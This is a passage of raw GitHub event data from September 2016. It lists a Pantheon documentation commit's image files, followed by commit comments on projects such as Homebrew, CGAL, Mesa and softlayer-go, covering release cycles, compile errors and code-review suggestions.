[source/docs/assets/images/deploy-log-live-env.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/deploy-log-live-env.png)\n- [source/docs/assets/images/dev-code-pendingchanges-commit.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dev-code-pendingchanges-commit.png)\n- [source/docs/assets/images/diff-screen.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/diff-screen.png)\n- [source/docs/assets/images/direct-download-archive.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/direct-download-archive.png)\n- [source/docs/assets/images/direct-download-backup.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/direct-download-backup.png)\n- [source/docs/assets/images/drush-aliases.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/drush-aliases.png)\n- [source/docs/assets/images/edu-read-instructions.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/edu-read-instructions.png)\n- [source/docs/assets/images/edu-site-selector.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/edu-site-selector.png)\n- [source/docs/assets/images/environment-access.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/environment-access.png)\n- [source/docs/assets/images/git-string.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/git-string.png)\n- [source/docs/assets/images/import-tool-db-and-files.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/import-tool-db-and-files.png)\n- [source/docs/assets/images/interface-dev-code-sftp-commit.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/interface-dev-code-sftp-commit.png)\n- [source/docs/assets/images/interface-site-settings-about.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/interface-site-settings-about.png)\n- [source/docs/assets/images/interface-workflow-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/interface-workflow-tool.png)\n- [source/docs/assets/images/invite-business-owner.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/invite-business-owner.png)\n- [source/docs/assets/images/launch-check-file-system-error.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/launch-check-file-system-error.png)\n- [source/docs/assets/images/lock-environment.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/lock-environment.png)\n- [source/docs/assets/images/machine-token-ready.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/machine-token-ready.png)\n- [source/docs/assets/images/manual-site-backup.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/manual-site-backup.png)\n- [source/docs/assets/images/merged-pull-request-1-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/merged-pull-request-1-dashboard.png)\n- [source/docs/assets/images/migrate-existing-site.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/migrate-existing-site.png)\n- [source/docs/assets/images/migration-authentication-error.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/migration-authentication-error.png)\n- [source/docs/assets/images/migration-authentication-prompt.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/migration-authentication-prompt.png)\n- [source/docs/assets/images/multi_org1.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/multi_org1.png)\n- [source/docs/assets/images/multi_org2.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/multi_org2.png)\n- [source/docs/assets/images/mysql-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/mysql-info.png)\n- [source/docs/assets/images/new-env-configs.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/new-env-configs.png)\n- [source/docs/assets/images/new-relic-add-on-image.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/new-relic-add-on-image.png)\n- [source/docs/assets/images/organization-dashboard-tour.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/organization-dashboard-tour.png)\n- [source/docs/assets/images/pantheon-create-machine-token.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-create-machine-token.png)\n- [source/docs/assets/images/pantheon-dashboard-git-commit-messages.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-dashboard-git-commit-messages.png)\n- [source/docs/assets/images/pantheon-dashboard-git-connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-dashboard-git-connection-info.png)\n- [source/docs/assets/images/pantheon-dashboard-settings-about-site-upstream.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-dashboard-settings-about-site-upstream.png)\n- [source/docs/assets/images/pantheon-dashboard-uncommitted-changes.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-dashboard-uncommitted-changes.png)\n- [source/docs/assets/images/pantheon-for-agencies-registration.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-for-agencies-registration.png)\n- [source/docs/assets/images/pantheon-user-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pantheon-user-dashboard.png)\n- [source/docs/assets/images/payment-invite.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/payment-invite.png)\n- [source/docs/assets/images/pes-options.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/pes-options.png)\n- [source/docs/assets/images/remove-ssh-key.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/remove-ssh-key.png)\n- [source/docs/assets/images/restore-button.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/restore-button.png)\n- [source/docs/assets/images/sandbox-make-owner.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/sandbox-make-owner.png)\n- [source/docs/assets/images/select-a-plan-and-billing.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/select-a-plan-and-billing.png)\n- [source/docs/assets/images/sftp-connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/sftp-connection-info.png)\n- [source/docs/assets/images/sftp-enabled.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/sftp-enabled.png)\n- [source/docs/assets/images/single-archive-import.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/single-archive-import.png)\n- [source/docs/assets/images/site-admin-env-links.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/site-admin-env-links.png)\n- [source/docs/assets/images/site-dashboard-image.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/site-dashboard-image.png)\n- [source/docs/assets/images/status-tab.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/status-tab.png)\n- [source/docs/assets/images/successful-site-migration-complete-blogvault.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/successful-site-migration-complete-blogvault.png)\n- [source/docs/assets/images/team-modal.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/team-modal.png)\n- [source/docs/assets/images/terminus-cli-code-committed-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/terminus-cli-code-committed-dashboard.png)\n- [source/docs/assets/images/terminus-cli-code-to-commit-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/terminus-cli-code-to-commit-dashboard.png)\n- [source/docs/assets/images/terminus-cli-open-dash.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/terminus-cli-open-dash.png)\n- [source/docs/assets/images/terminus-commit-with-message.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/terminus-commit-with-message.png)\n- [source/docs/assets/images/test-env.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/test-env.png)\n- [source/docs/assets/images/uncommitted-pantheon-yml.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/uncommitted-pantheon-yml.png)\n- [source/docs/assets/images/update-plan-prompt-https.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/update-plan-prompt-https.png)\n- [source/docs/assets/images/upstream-link.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/upstream-link.png)\n- [source/docs/assets/images/user-account-machine-token-list.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/user-account-machine-token-list.png)\n- [source/docs/assets/images/verify-reroute-email-dashboard-commits1.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/verify-reroute-email-dashboard-commits1.png)\n- [source/docs/assets/images/verify-reroute-email-dashboard-commits2.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/verify-reroute-email-dashboard-commits2.png)\n- [source/docs/assets/images/visit-development-site.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/visit-development-site.png)\n- [source/docs/assets/images/workflow-tab.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/workflow-tab.png)\n"}},"created_at":"2016-09-30T19:18:37Z"}
{"id":"4645344871","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19246547,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T19:19:12Z","updated_at":"2016-09-30T19:19:12Z","body":"@DomT4:  Hmm, I see. When I look at the [changelog](https://cgit.freedesktop.org/p11-glue/p11-kit/tree/NEWS), though, it appears that p11-kit has an 'odd-even' (development/stable) release cycle.  As such, are you and the others OK with listing a development release as stable here in Homebrew Core in this case (iffy, IMO;) or should I open an issue or PR up for this?  (I know that the latter would be better because I understand from past experience/comments that you guys tend to frown upon submitting issues in anticipation of PRs here, but I'm about to do a `brew update` here down on my end and, as such, will be indisposed for a bit since mucking around in `brew`-land while the `brew` executable is running is a big 'no-no!'  I'm perfectly fine with having the development version linger on my machine for a little while anyway until either I or somebody else gets around to fixing this due to the fact that, according to the [changelog](https://cgit.freedesktop.org/p11-glue/p11-kit/tree/NEWS), the unstable changes don't seem to be particularly invasive even though they might still require development testing upstream.  (Also, apologies in advance for the small wall of text, but I wasn't quite sure how to quickly summarize my thoughts here…)  "}},"created_at":"2016-09-30T19:19:12Z"}
{"id":"4645348160","type":"CommitCommentEvent","actor":{"login":"sistemasdesarrollo"},"repo":{"name":"sistemasdesarrollo/SGOCACSA"},"payload":{"comment":{"id":19246555,"position":null,"line":null,"path":null,"commit_id":"538ea631aa88a3bcb23f99de8430c6aaeff07435","created_at":"2016-09-30T19:19:53Z","updated_at":"2016-09-30T19:19:53Z","body":"hi"}},"created_at":"2016-09-30T19:19:53Z"}
{"id":"4645356131","type":"CommitCommentEvent","actor":{"login":"friism"},"repo":{"name":"Microsoft/sql-server-samples"},"payload":{"comment":{"id":19246580,"position":null,"line":null,"path":null,"commit_id":"d9254d0d6c153e30eed610c32dfc8191d746588d","created_at":"2016-09-30T19:21:32Z","updated_at":"2016-09-30T19:21:32Z","body":"@perrysk-msft I take this to mean that you are not in favor of my PR...? https://github.com/Microsoft/sql-server-samples/pull/133"}},"created_at":"2016-09-30T19:21:32Z"}
{"id":"4645366891","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/rabbits-and-foxes-awolek"},"payload":{"comment":{"id":19246608,"position":null,"line":null,"path":null,"commit_id":"d6d33c06cf68fc57be8f5ea01f1e7d597eddc95e","created_at":"2016-09-30T19:23:48Z","updated_at":"2016-09-30T19:23:48Z","body":"Oops. Did you clone this \"github-assigment\" into your rabbits and foxes repository??"}},"created_at":"2016-09-30T19:23:48Z"}
{"id":"4645367737","type":"CommitCommentEvent","actor":{"login":"AlexanderSoroka"},"repo":{"name":"VladislavSevruk/EPAM-TAT"},"payload":{"comment":{"id":19246615,"position":52,"line":52,"path":"Homework-3/src/by/epam/tat/main/Main.java","commit_id":"092ef6698aeb4c05a0474c8c17cea4fa7d092ca0","created_at":"2016-09-30T19:23:59Z","updated_at":"2016-09-30T19:23:59Z","body":"It's very bad idea to compare floating point values in such way - please take a look http://www.cygnus-software.com/papers/comparingfloats/Comparing%20floating%20point%20numbers.htm "}},"created_at":"2016-09-30T19:23:59Z"}
{"id":"4645368139","type":"CommitCommentEvent","actor":{"login":"lrineau"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":19246617,"position":null,"line":null,"path":null,"commit_id":"cf8c1a6cdfb8f29316c46f3f13b1edad9a379bfe","created_at":"2016-09-30T19:24:04Z","updated_at":"2016-09-30T19:24:04Z","body":"@afabri \r\nYou forgot to modify the file `Linear_cell_complex/demo/Linear_cell_complex/typedefs.h`. There are compilation errors:\r\n```\r\n../Linear_cell_complex/demo/Linear_cell_complex/MainWindow.cpp: In member function ‘void MainWindow::load_off(const QString&, bool)’:\r\n../Linear_cell_complex/demo/Linear_cell_complex/MainWindow.cpp:396:3: error: ‘import_from_polyhedron_3_flux’ is not a member of ‘CGAL’\r\n   CGAL::import_from_polyhedron_3_flux < LCC > (*scene.lcc, ifs);\r\n   ^~~~\r\n../Linear_cell_complex/demo/Linear_cell_complex/MainWindow.cpp:396:45: error: expected primary-expression before ‘>’ token\r\n   CGAL::import_from_polyhedron_3_flux < LCC > (*scene.lcc, ifs);\r\n                                             ^\r\n```\r\n"}},"created_at":"2016-09-30T19:24:04Z"}
{"id":"4645369450","type":"CommitCommentEvent","actor":{"login":"Altosk"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19246623,"position":null,"line":null,"path":null,"commit_id":"bee4accbe714bc57cae30aa3f384d22604035931","created_at":"2016-09-30T19:24:20Z","updated_at":"2016-09-30T19:24:20Z","body":"This patch breaks Diablo III and The battle.net app."}},"created_at":"2016-09-30T19:24:20Z"}
{"id":"4645375385","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19246638,"position":null,"line":null,"path":null,"commit_id":"bee4accbe714bc57cae30aa3f384d22604035931","created_at":"2016-09-30T19:25:32Z","updated_at":"2016-09-30T19:25:32Z","body":"Are you sure it is this patch and not another ?"}},"created_at":"2016-09-30T19:25:32Z"}
{"id":"4645381707","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19246653,"position":null,"line":null,"path":null,"commit_id":"bee4accbe714bc57cae30aa3f384d22604035931","created_at":"2016-09-30T19:26:52Z","updated_at":"2016-09-30T19:26:52Z","body":"oh my mistake, I send a fix"}},"created_at":"2016-09-30T19:26:52Z"}
{"id":"4645386521","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19246670,"position":null,"line":null,"path":null,"commit_id":"bee4accbe714bc57cae30aa3f384d22604035931","created_at":"2016-09-30T19:27:51Z","updated_at":"2016-09-30T19:27:51Z","body":"Done, another version of the patch was pushed."}},"created_at":"2016-09-30T19:27:51Z"}
{"id":"4645386804","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19246671,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T19:27:55Z","updated_at":"2016-09-30T19:27:55Z","body":"We should probably downgrade, yes. GNOME played a part in making odd/even devel/stable popular, but even GNOME fail to follow it particularly well for stuff <1.0, so the confusion here is plenty understandable."}},"created_at":"2016-09-30T19:27:55Z"}
{"id":"4645387088","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/rabbits-and-foxes-CFulco"},"payload":{"comment":{"id":19246672,"position":null,"line":null,"path":null,"commit_id":"fa1a1ac8dc816d416da4146417ee86a7687cc7a5","created_at":"2016-09-30T19:27:59Z","updated_at":"2016-09-30T19:27:59Z","body":"This was close. I guess, looking at the error message, you just needed your function to return a single tuple instead of two values, i.e. `return (f1, f2)` instead of `return f1, f2`."}},"created_at":"2016-09-30T19:27:59Z"}
{"id":"4645388343","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19246673,"position":null,"line":null,"path":null,"commit_id":"53b88845f5530d03b5c2770cc05ad9e506b7753b","created_at":"2016-09-30T19:28:14Z","updated_at":"2016-09-30T19:28:14Z","body":"For the first point: yes, I know, but I am suspicious. This part of code has been reworked many time in the last year, so let us check empirically.\r\n\r\nThe second one is really just for completeness, I don't think it has a remote chance."}},"created_at":"2016-09-30T19:28:14Z"}
{"id":"4645390072","type":"CommitCommentEvent","actor":{"login":"osysltd"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19246677,"position":null,"line":null,"path":null,"commit_id":"61f97ca7ad5d1f06289fd053ecdabe4b52f37032","created_at":"2016-09-30T19:28:36Z","updated_at":"2016-09-30T19:28:36Z","body":"Latest changes for LEGIC, awesome!"}},"created_at":"2016-09-30T19:28:36Z"}
{"id":"4645400080","type":"CommitCommentEvent","actor":{"login":"AcesHigh70"},"repo":{"name":"digipost/saaj"},"payload":{"comment":{"id":19246702,"position":null,"line":null,"path":null,"commit_id":"fe02d272512207008413a5d8167a710a727f93a1","created_at":"2016-09-30T19:30:38Z","updated_at":"2016-09-30T19:30:38Z","body":"@landro, it looks like SAAJ has not been released for a while.  The last release was 1.3.25.  Your fix for this issue should go with 1.3.26.  Do you know if there are plans to release 1.3.26?  How does this code make it into the JDK, and once 1.3.26 is released which JDK's will the 1.3.26 version be pulled into?\r\n\r\nA more general question is how do I tell what version of a standalone technology like SAAJ is in a particular JDK?"}},"created_at":"2016-09-30T19:30:38Z"}
{"id":"4645400254","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19246703,"position":45,"line":392,"path":"src/gallium/state_trackers/nine/nine_pipe.h","commit_id":"98110d78cf2a214f8cba646a390328da0f4bb512","created_at":"2016-09-30T19:30:41Z","updated_at":"2016-09-30T19:30:41Z","body":"we could have format X supporting multisampling 2 4 and Y supporting 2 and 8.\r\nWe have to be careful to not mix X with 4 and Y with 8.\r\n\r\nBut in practice on radeon all formats do support the same multisampling levels."}},"created_at":"2016-09-30T19:30:41Z"}
{"id":"4645402375","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19246705,"position":28,"line":28,"path":"task.py","commit_id":"5860608e55e5cea9d880a6ad1db9fa1ea5bc6a79","created_at":"2016-09-30T19:31:08Z","updated_at":"2016-09-30T19:31:08Z","body":"Missing `yield` args!"}},"created_at":"2016-09-30T19:31:08Z"}
{"id":"4645405321","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19246712,"position":null,"line":null,"path":null,"commit_id":"b2baeef2f9133b540ab6703ec2cff935c3d4786c","created_at":"2016-09-30T19:31:46Z","updated_at":"2016-09-30T19:31:46Z","body":"I suggest you to not commit more than one issue next time. The general principle is simple: 1 commit = 1 subject.  "}},"created_at":"2016-09-30T19:31:46Z"}
{"id":"4645405986","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19246714,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T19:31:55Z","updated_at":"2016-09-30T19:31:55Z","body":"@DomT4:  Erk, sounds like that could get nasty!  The changelog is pretty clear about the devs following the rules here, though, so, again, should I submit a preliminary issue now or wait until my `brew upgrade` finishes and submit a full-fledged PR, or will you guys take care of this?  "}},"created_at":"2016-09-30T19:31:55Z"}
{"id":"4645406854","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19246716,"position":36,"line":36,"path":"task.py","commit_id":"5860608e55e5cea9d880a6ad1db9fa1ea5bc6a79","created_at":"2016-09-30T19:32:05Z","updated_at":"2016-09-30T19:32:05Z","body":"More efficiently: `del cls._walkParents[-1]`."}},"created_at":"2016-09-30T19:32:05Z"}
{"id":"4645410601","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19246722,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T19:32:54Z","updated_at":"2016-09-30T19:32:54Z","body":"@DomT4:  Oh, wait; looks my `brew upgrade` finished!  I'll just go ahead and submit a PR to fix this, then…  "}},"created_at":"2016-09-30T19:32:54Z"}
{"id":"4645411454","type":"CommitCommentEvent","actor":{"login":"amirgon"},"repo":{"name":"Kilay/node-http-ntlm"},"payload":{"comment":{"id":19246723,"position":7,"line":76,"path":"httpntlm.js","commit_id":"0cfd6a5aad3be77c8f92cd6b256938c5b768431d","created_at":"2016-09-30T19:33:04Z","updated_at":"2016-09-30T19:33:04Z","body":"Ok, but why are you passing callback as an argument of callback? Did you mean to pass the function reference to the same function as an argument?"}},"created_at":"2016-09-30T19:33:04Z"}
{"id":"4645415417","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19246733,"position":58,"line":61,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T19:33:57Z","updated_at":"2016-09-30T19:33:57Z","body":"should you check if there is a provision transaction? to avoid a potential panic."}},"created_at":"2016-09-30T19:33:57Z"}
{"id":"4645416723","type":"CommitCommentEvent","actor":{"login":"CamilleZHENG"},"repo":{"name":"CamilleZHENG/Integration-My-Page-Web-1"},"payload":{"comment":{"id":19246736,"position":null,"line":null,"path":null,"commit_id":"610156ea8114c3277b8a44cd184dcdc46c89cae7","created_at":"2016-09-30T19:34:11Z","updated_at":"2016-09-30T19:34:11Z","body":"test"}},"created_at":"2016-09-30T19:34:11Z"}
{"id":"4645417991","type":"CommitCommentEvent","actor":{"login":"awolek"},"repo":{"name":"CHME5137/rabbits-and-foxes-awolek"},"payload":{"comment":{"id":19246740,"position":null,"line":null,"path":null,"commit_id":"d6d33c06cf68fc57be8f5ea01f1e7d597eddc95e","created_at":"2016-09-30T19:34:28Z","updated_at":"2016-09-30T19:34:28Z","body":"I think I accidentally did this before I redid it the correct way."}},"created_at":"2016-09-30T19:34:28Z"}
{"id":"4645434830","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"randomstuffpaul/android_device_samsung_msm8660-common"},"payload":{"comment":{"id":19246787,"position":5,"line":11,"path":"camera/Android.mk","commit_id":"bebeb6efc5b4dc8ceb78fd4faf817e6698d17bbc","created_at":"2016-09-30T19:38:09Z","updated_at":"2016-09-30T19:38:09Z","body":"Derp, we need this"}},"created_at":"2016-09-30T19:38:09Z"}
{"id":"4645435032","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19246789,"position":9,"line":13,"path":"tests/intersectionTest.js","commit_id":"b2baeef2f9133b540ab6703ec2cff935c3d4786c","created_at":"2016-09-30T19:38:11Z","updated_at":"2016-09-30T19:38:11Z","body":"No newline at end of file again.\r\n\r\nUse http://eslint.org if you want to make your codestyle consistent and automate checks.\r\nSee how it's done in [hexlet's js boilerplate](https://github.com/hexlet-boilerplates/javascript-package)."}},"created_at":"2016-09-30T19:38:11Z"}
{"id":"4645436271","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19246795,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T19:38:27Z","updated_at":"2016-09-30T19:38:27Z","body":"EMSIllumSetPoint (wfbuhl) - Win64-Windows-7-VisualStudio-12: OK (2344 of 2345 tests passed, 3 test warnings)\n\n * 3 tests had: AUD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-30T19:38:27Z"}
{"id":"4645437002","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19246799,"position":58,"line":61,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T19:38:36Z","updated_at":"2016-09-30T19:38:36Z","body":"See 5 lines above"}},"created_at":"2016-09-30T19:38:36Z"}
{"id":"4645437937","type":"CommitCommentEvent","actor":{"login":"samhinshaw"},"repo":{"name":"STAT545-UBC/STAT545-UBC.github.io"},"payload":{"comment":{"id":19246803,"position":null,"line":null,"path":null,"commit_id":"5d81cc7da8148d590cd1ae2471de67b5f667505d","created_at":"2016-09-30T19:38:48Z","updated_at":"2016-09-30T19:38:48Z","body":":+1: \r\n\r\nSorry for my slow response time this week, moving apartments and everything is crazy :flushed: "}},"created_at":"2016-09-30T19:38:48Z"}
{"id":"4645444097","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19246826,"position":26,"line":37,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T19:40:09Z","updated_at":"2016-09-30T19:40:09Z","body":"Depends on which order items are passed, which is up to the user. Do we have to mention it? Would the way it checks status need to change if items were from multiple orders?"}},"created_at":"2016-09-30T19:40:09Z"}
{"id":"4645446784","type":"CommitCommentEvent","actor":{"login":"mwpastore"},"repo":{"name":"jeremyevans/rodauth"},"payload":{"comment":{"id":19246832,"position":null,"line":null,"path":null,"commit_id":"e1c258ea707cddbcb391399ef540ccfd1f85414b","created_at":"2016-09-30T19:40:43Z","updated_at":"2016-09-30T19:40:43Z","body":"This is amazing! Thanks Jeremy. I had started integrating my patched jwt feature into my application and was able to quickly tweak it to fit your new paradigm. The one thing I'm realizing is that we may need to do something like `jwt_session_hash` for `jwt_decode_opts` in order to access Rodauth auth value methods in verifiers. How do you feel about that and would you like me to try to implement it? "}},"created_at":"2016-09-30T19:40:43Z"}
